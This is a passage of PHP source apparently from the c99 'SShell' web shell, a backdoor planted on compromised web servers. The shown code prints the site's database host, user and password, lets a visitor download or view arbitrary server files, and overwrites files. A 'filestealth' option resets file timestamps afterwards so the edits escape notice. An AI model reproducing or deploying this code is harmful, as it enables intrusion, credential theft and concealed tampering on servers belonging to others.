Please, report us for fix.";} echo "Parameters for manual connect: "; $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."' ";} echo " "; } } echo " "; if (!empty($white)) {@ob_clean();} highlight_file($d.$f); if (!empty($white)) {c99shexit();} echo " "; } elseif ($ft == "download") { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".filesize($d.$f)); header("Content-disposition: attachment; filename=\"".$f."\";"); echo $r; exit; } elseif ($ft == "notepad") { @ob_clean(); header("Content-type: text/plain"); header("Content-disposition: attachment; filename=\"".$f.".txt\";"); echo($r); exit; } elseif ($ft == "edit") { if (!empty($submit)) { if ($filestealth) {$stat = stat($d.$f);} $fp = fopen($d.$f,"w"); if (!$fp) {echo "Can't write to file!";} else { echo "Saved!"; fwrite($fp,$edit_text); fclose($fp); if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} $r = $edit_text; } } $rows = count(explode("
",$r)); if ($rows < 10) {$rows = 10;} if ($rows > 30) {$rows = 30;} echo ""; } elseif (!empty($ft)) {echo " |
:: Command execute :: | |
--[ SShell v. {$shver} | http://no.net | Generation time: ".round(getmicrotime()-starttime,4)." ]-- |